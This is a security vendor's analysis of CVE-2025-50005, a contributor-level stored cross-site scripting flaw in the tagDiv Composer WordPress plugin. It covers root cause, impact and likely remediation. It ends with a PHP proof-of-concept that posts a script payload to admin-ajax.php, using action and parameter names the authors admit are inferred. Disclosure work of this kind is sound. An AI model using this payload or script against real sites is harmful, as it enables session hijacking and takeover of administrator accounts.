Atomic Edge analysis of CVE-2025-50005 (metadata-based):
The tagDiv Composer WordPress plugin version 5.4.2 and earlier contains an authenticated stored cross-site scripting vulnerability. Contributor-level users or higher can inject arbitrary JavaScript into pages or posts. The vulnerability resides in insufficient input sanitization and output escaping within the plugin’s page builder components.
Atomic Edge research infers the root cause is improper neutralization of user-controlled input before web page generation (CWE-79). The plugin likely fails to apply WordPress sanitization functions like `sanitize_text_field` or `wp_kses_post` to user-supplied data before storing it in the database. The plugin also likely fails to apply proper output escaping functions like `esc_html` or `esc_js` when retrieving and displaying that data. These conclusions are inferred from the CWE classification and vulnerability description, as source code for the vulnerable version is unavailable.
Exploitation requires an authenticated user with at least contributor privileges. The attacker would access a page or post editing interface where the tagDiv Composer plugin adds custom fields or blocks. They would inject a malicious script payload into a vulnerable parameter. The payload would be saved to the database. The script executes in the victim’s browser when they view the compromised page. The CVSS vector indicates network attack complexity, low privileges, and no user interaction, confirming a straightforward injection into backend forms.
Remediation requires implementing proper input validation and output escaping. The patched version (5.4.3) likely added calls to WordPress core sanitization functions (`sanitize_text_field`, `wp_kses`) on all user-controlled input before database storage. The patch also likely added output escaping functions (`esc_html`, `esc_attr`, `esc_js`) when rendering stored content in browser contexts. Proper capability checks should already exist given the contributor-level requirement.
Successful exploitation leads to stored XSS. Injected scripts execute with the privileges of the viewing user. This allows session hijacking, malicious redirects, or administrative actions if an administrator views the page. The CVSS score of 6.4 reflects medium confidentiality and integrity impacts with no direct availability impact. Scope is changed, meaning the vulnerability can affect components beyond the plugin’s own security context.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-50005 - tagDiv Composer <= 5.4.2 - Authenticated (Contributor+) Stored Cross-Site Scripting
<?php
/**
* Proof of Concept for CVE-2025-50005.
* ASSUMPTIONS: The vulnerability exists in a frontend or backend form field processed by the plugin.
* The exact parameter name is unknown, but common patterns include 'tdc_content', 'content', or custom field names.
* This PoC targets a generic POST request to update page content via the plugin's AJAX or save handler.
*/
$target_url = 'https://example.com/wp-admin/admin-ajax.php'; // Adjust to target
$username = 'contributor_user'; // Contributor-level credentials
$password = 'contributor_pass';
$page_id = 123; // Target page ID
// Payload: A simple alert to demonstrate script execution.
// Real attacks would use more sophisticated JavaScript for session theft.
$xss_payload = '<script>alert(document.domain)</script>';
// Step 1: Authenticate and obtain cookies/nonce.
// WordPress often requires a nonce for AJAX actions. This may be obtained from an edit page.
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $target_url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query([
'action' => 'tdc_ajax_save_content', // Inferred action name based on plugin slug 'td-composer'
'post_id' => $page_id,
'tdc_content' => $xss_payload, // Injected into a content parameter
'nonce' => 'VALID_NONCE_HERE' // Requires prior nonce extraction from page
]),
CURLOPT_COOKIEJAR => 'cookies.txt',
CURLOPT_COOKIEFILE => 'cookies.txt',
]);
$response = curl_exec($ch);
curl_close($ch);
echo "PoC sent. Visit page ID {$page_id} to trigger XSS.n";
echo "NOTE: This PoC requires a valid nonce and contributor session cookies.n";
echo "The exact action and parameter names are inferred from plugin conventions.n";
?>
